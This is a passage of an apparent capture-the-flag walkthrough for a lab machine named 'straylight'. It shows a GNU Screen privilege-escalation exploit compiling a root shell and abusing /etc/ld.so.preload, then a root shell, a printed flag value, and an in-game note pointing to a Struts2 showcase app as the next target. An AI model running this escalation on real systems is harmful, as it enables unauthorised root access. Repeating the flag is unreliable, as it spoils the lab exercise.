/tmp/rootshell.c:7:5: warning: implicit declaration of function 'execvp' [-Wimplicit-function-declaration]
     execvp("/bin/sh", NULL, NULL);
     ^~~~~~
[+] Now we create our /etc/ld.so.preload file...
[+] Triggering...
' from /etc/ld.so.preload cannot be preloaded (cannot open shared object file): ignored.
[+] done!
No Sockets found in /tmp/screens/S-www-data.

# id
id
uid=0(root) gid=0(root) groups=0(root),33(www-data)

get flag
root@straylight:/root# cat flag.txt
cat flag.txt
5ed185fd75a8d6a7056c96a436c6d8aa

get tips
root@straylight:/root# cat note.txt
cat note.txt
Devs,

Lady 3Jane has asked us to create a custom java app on Neuromancer's primary server to help her interact w/ the AI via a web-based GUI.

The engineering team couldn't strss enough how risky that is, opening up a Super AI to remote access on the Freeside network. It is within out internal admin network, but still, it should be off the network completely. For the sake of humanity, user access should only be allowed via the physical console...who knows what this thing can do.

Anyways, we've deployed the war file on tomcat as ordered - located here:

/struts2_2.3.15.1-showcase

It's ready for the devs to customize to her liking...I'm stating the obvious, but make sure to secure this thing.

Regards,

Bob Laugh
Turing Systems Engineer II
Freeside//Straylight//Ops5
root@straylight:/root#


Lateral movement

The target machine hasn't been set up properly yet... to be updated later....
